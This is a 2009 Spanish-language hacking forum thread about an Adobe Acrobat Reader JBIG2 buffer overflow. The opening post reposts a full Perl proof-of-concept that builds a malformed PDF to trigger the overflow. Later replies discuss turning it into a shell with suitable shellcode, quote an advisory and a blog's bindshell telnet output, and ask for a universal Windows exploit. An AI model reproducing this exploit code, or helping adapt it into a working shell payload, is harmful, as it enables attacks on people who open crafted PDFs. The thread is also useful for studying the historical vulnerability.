elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
14 Febrero 2012, 09:25  


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Adobe Acrobat Reader JBIG2 Local Buffer Overflow PoC #2 0day
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Adobe Acrobat Reader JBIG2 Local Buffer Overflow PoC #2 0day  (Leído 2,160 veces)
WHK
吴阿卡
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.944


The Hacktivism is not a crime


Ver Perfil WWW
Adobe Acrobat Reader JBIG2 Local Buffer Overflow PoC #2 0day
« en: 2 Marzo 2009, 00:55 »

Pude ver desde milw0rm multiples fallas de Adobe Acrobat donde puedes dar ejecución remota desde archivos.pdf:
http://milw0rm.com/search.php -> "adobe"

Código
#!/usr/bin/perl
# k`sOSe 02/22/2009
 
# http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.html
 
my $size = "\x40\x00";
my $factor = "ABCD";
my $data = "A" x 8314;
 
 
print pdf();
 
sub pdf()
{
 
"%PDF-1.5\n" .
"%\xec\xf5\xf2\xe1\xe4\xef\xe3\xf5\xed\xe5\xee\xf4\n" .
"3 0      \n" .
"xref\n" .
"3 16\n" .
"0000000023 00000 n \n" .
"0000000584 00000 n \n" .
"0000000865 00000 n \n" .
"0000001035 00000 n \n" .
"0000001158 00000 n \n" .
"0000001287 00000 n \n" .
"0000001338 00000 n \n" .
"0000001384 00000 n \n" .
"0000002861 00000 n \n" .
"0000003637 00000 n \n"  .
"0000005126 00000 n \n" .
"0000005173 00000 n \n" .
"0000005317 00000 n \n" .
"0000005370 00000 n \n" .
"0000005504 00000 n \n" .
"0000000714 00000 n \n" .
"trailer\n" .
"<</Root 4 0 R/Info 2 0 R/ID[<AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA> <AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>]/Size 19/Prev 10218>>\n" .
"startxref\n" .
"0\n" .
"%%EOF\n" .
"   \n" .
"4 0 obj\n" .
"<</Type/Catalog/Pages 1 0 R/OCProperties<</OCGs[9 0 R 13 0 R]/D<</Order[9 0 R 13 0 R]/ON[9 0 R 13 0 R]/OFF[]>>>>>>\n" .
"endobj\n" .
"         \n" .
"5 0 obj\n" .
"<</Type/Page/MediaBox[0 0 640 480]/Resources<</XObject<</Im001 7 0 R/Im002 10 0 R/Im003 11 0 R/Im004 14 0 R/Im005 16 0 R>>>>/Contents 6 0 R/Parent 1 0 R>>\n" .
"endobj\n" .
"6 0 obj\n" .
"<</Length 56/Filter/FlateDecode>>\n" .
"stream\n" .
"x\x9c\xe3*T031P\x00A\x13\x0b\x08\x9d\x9c\xab\xa0\xef\x99k``\xa8\xe0\x92\xaf\x10\xc8\x85[\x81\x11!\x05\xc6\x84\x14\x98\xc0\x14\xc0\$\@\xb4\x05\xb2\n" .
"S\xb0\n" .
"\x00J\x15#,\n" .
"endstream\n" .
"endobj\n" .
 
"12 0 obj\n" .
"<</Subtype/Image/Width 640/Height 480/ColorSpace/DeviceGray/BitsPerComponent 1/Decode[1 0]/Interpolate true/Length 1314/Filter/JBIG2Decode>>\n" .
"stream\n" .
"\x00\x00\x00\x01" . $size . $factor . "\x13" . $data . "endstream\n" .
"endobj\n" .
"13 0 obj\n" .
"<</Type/OCG/Name(Text Color)>>\n" .
"endobj\n" .
"14 0 obj\n" .
"<</Subtype/Image/Width 1/Height 1/ColorSpace/DeviceGray/BitsPerComponent 8/SMask 12 0 R/OC 15 0 R/Length 1>>\n" .
"stream\n" .
"\x00\n" .
"endstream\n" .
"endobj\n" .
 
"1 0 obj\n" .
"<</Type/Pages/Kids[5 0 R]/Count 1>>\n" .
"endobj\n" .
"xref\n" .
"0 3\n" .
"0000000000 65535 f \n" .
"0000009988 00000 n \n" .
"0000010039 00000 n \n" .
"trailer\n" .
"<</ID[<AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA> <AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>]/Size 3>>\n" .
"startxref\n" .
"104\n" .
"%%EOF\n";
 
}
 
# milw0rm.com [2009-02-23]

"\x00\x00\x00\x01" . $size . $factor . "\x13" . $data . "endstream\n" <- Overflow
« Última modificación: 2 Marzo 2009, 00:57 por WHK » En línea


AlbertoBSD
Estudiante y
Colaborador
***
Desconectado Desconectado

Mensajes: 1.955


Anonymous & Paranoid


Ver Perfil WWW
Re: Adobe Acrobat Reader JBIG2 Local Buffer Overflow PoC #2 0day
« Respuesta #1 en: 2 Marzo 2009, 02:38 »

A valla apenas que estaba viendo la noticia en securityfocus, lo voy a probar.

Saludos.
En línea

Bien Super Divertido
@wifigdlmx
Novlucker
Ninja y
Ex-Staff
*
Desconectado Desconectado

Mensajes: 10.225


Yo que tu lo pienso dos veces


Ver Perfil
Re: Adobe Acrobat Reader JBIG2 Local Buffer Overflow PoC #2 0day
« Respuesta #2 en: 9 Marzo 2009, 12:49 »

Es realmente interesante como se ha llegado al punto de no tener que dar click en el archivo :o

En el blog de Didier Stevens se explica un poco más de esto, así como también se deja un video de tres POC's


Saludos  :P
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
http://twitter.com/novlucker

"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein

Misomeister

Desconectado Desconectado

Mensajes: 65


Power. Infinite and Unlimited Power.


Ver Perfil
Re: Adobe Acrobat Reader JBIG2 Local Buffer Overflow PoC #2 0day
« Respuesta #3 en: 27 Marzo 2009, 03:45 »

Y con este bug, modificándolo un poco, ¿me permitiría abrir una shell con privilegios de Administrador?
En línea
AlbertoBSD
Estudiante y
Colaborador
***
Desconectado Desconectado

Mensajes: 1.955


Anonymous & Paranoid


Ver Perfil WWW
Re: Adobe Acrobat Reader JBIG2 Local Buffer Overflow PoC #2 0day
« Respuesta #4 en: 27 Marzo 2009, 15:49 »

Shell tal vez poniendo el shellcode correcto o segun lo que quieras ejecutar, de administrador no

:http://www.securityfocus.com/bid/33751/discuss

Citar
An attacker can exploit this issue to execute arbitrary code with the privileges of the user running the application or crash the application, denying service to legitimate users.

:http://bl4cksecurity.blogspot.com/2009/03/adobe-acrobatreader-universal-exploit.html

Citar
This technique works both on acrobat/reader 9 with the same offsets :D:D:D. One, two, twenty-three, four...adobe bindshell landing at your door.

C:\Documents and Settings\Administrator\Desktop> telnet localhost 5500

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>


Saludos
En línea

Bien Super Divertido
@wifigdlmx
berz3k
Moderador
***
Desconectado Desconectado

Mensajes: 1.127



Ver Perfil
Re: Adobe Acrobat Reader JBIG2 Local Buffer Overflow PoC #2 0day
« Respuesta #5 en: 27 Marzo 2009, 20:24 »

Apenas tengo la oportunidad de probar, veo el code para XP que no lo tengo a la mano, alguien con un code universal para win32 ?

-berz3k.
En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines